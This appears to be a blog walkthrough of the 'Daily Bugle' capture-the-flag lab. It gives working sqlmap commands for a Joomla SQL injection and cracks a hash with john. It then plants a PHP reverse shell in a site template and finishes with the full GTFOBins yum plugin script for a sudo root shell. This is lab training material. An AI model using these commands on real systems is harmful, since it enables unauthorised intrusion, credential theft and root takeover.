Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
Oh man, I dunno about this one. We're getting into the 'Hard' modes (you didn't even buy me dinner first!) here and I'm barely making it through mediums without spending tons of time researching and reading write ups ... but here we go.
Let's start with an nmap
Looks like we have an SSH port on 22, a web server on port 80 and a MariaDB database on port 3306. Of interest there's also a robots.txt file with a bunch of folders to not look at. I love nmap for enumerating all that for me... saves a gobuster! not ghostbuster... GOBUSTER.... pay attention.
Opening the website, it's a Daily Bugle site with a very real looking SpiderMan who's been caught robbing a bank... that happens to have shelving... full of food...
We click around the site a bit but there's not much there. There's a login form and a forgot password/password link that asks for a email address. If we start working through the sub-directories in the robots.txt file we got from our nmap, we can see an admin login for Joomla. Bingo! ... was his name-o...
To find the version, I started with help from this site: https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website which lead me to this location: http://10.10.201.235/administrator/language/en-GB/en-GB.xml which outlined the version of Joomla we're using in an XML document.
Exploit-db looks like it has an un-verified vulnerability:
According to the vulnerability, there's a crafted URL that we can pass to sqlmap and it will do its thing. I know the page said to try a python script but I'm working on a hard with a medium expertise here, take it easy on me. A win will be a win.
SQLMap gave us a list of databases to check out. I think I'm going to go after that joomla database and see if I can find some usernames/passwords.
we're going to add to our command the --tables options:
sqlmap -u "http://10.10.201.235/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --tables
The joomla table show a users option... which is what I want.
Database: joomla
[72 tables]
+----------------------------------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
< snip >
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_map |
| #__usergroups |
| #__users < ------- |
| #__utf8_conversion |
| #__viewlevels |
+----------------------------------------------+
Im going to dump the contents of this table using... guess... what the command is lol
-T table "#__users" --dump
During the scan-and-grab (new store name?) it couldn't get the table data, I'm not sure if it's 'cause of the # sign or something else.
BUT! It asked me if I wanted to do a common column existence check, so I did that and let it use its common-columns file to find what I needed.
It took a while but then I got the user and hash that I needed.
I'm going to take that hash and put it in a file called pwdhash, then use john to decode that hash.
john pwdhash --wordlist=/usr/share/wordlists/rockyou.txt
Sweet. So we have a username and password... it doesn't work on the ssh login but does on the joomla login. FOOTHOLD! well... for the web app.
I know we have to get an reverse shell here... and it's likely a PHP one but I'm having a hard time finding a way to get one uploaded. The article code section removes the PHP code and turns it into block comments. I've tried URL encoding and nada.
Going into the templates area we can edit each page there. I'm going to add my php reverse shell script to the bottom of the index.php page - I'm using the one from pentestmonkey.
Next we'll start a netcat listener on the port we provided in the shell and visit the main page to trigger.
If we traverse down to the home directory, we see a user named jjameson but we don't have access to it. If we try and switch the user we're not lucky enough that he's used the same password as he did for his Joomla account.
We can also see we're in the 'apache' security groups and that's about it.
If we try and do a sudo -l to see what sort of elevation we can get we get the error:
sudo: no tty present and no askpass program specified
This means it attempted to request our password but couldn't find a tty app to pop that question on the screen for us. We can upgrade our shell with this:
python -c 'import pty; pty.spawn("/bin/bash")'
ohhhh shiny new shell! ...but we still don't know the password so that's not helpful.
Poking around a bit, there is a configuration.php file in the web root /var/www/html. Reading that file will give us some credentials for the database, which also happens to work for an su option to use with that jjameson account we saw eariler - horray for re-used passwords!
Just know, when you switch user it may just be a blank curser if you haven't done the tty fix above.
We can now cd into the /home/jjameson folder and cat out that sweet juicy user.txt file now though!
OK, so we now just need the root flag. I see the description says something about using YUM... and the hint here is gtfobins... We're in a new user account so I thought I'd check our sudo list out and it turns out we're only allowed to run yum, imagine that... maybe we're supposed to do something with... yum, was it?
Well, well, look at this. There's a whole gtfobins section for yum: https://gtfobins.github.io/gtfobins/yum/
In fact, there's a whole option to spawn an interactive root shell with a custom plugin.
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
After doing this we get dropped into a root shell! Horray! I am the MAN! ... and also very humble... just ask me.
We can now cd into root and grab that flag!
Dang son! We chopped our way through a HARD! Hands up baby! Wooooo!
Commentaires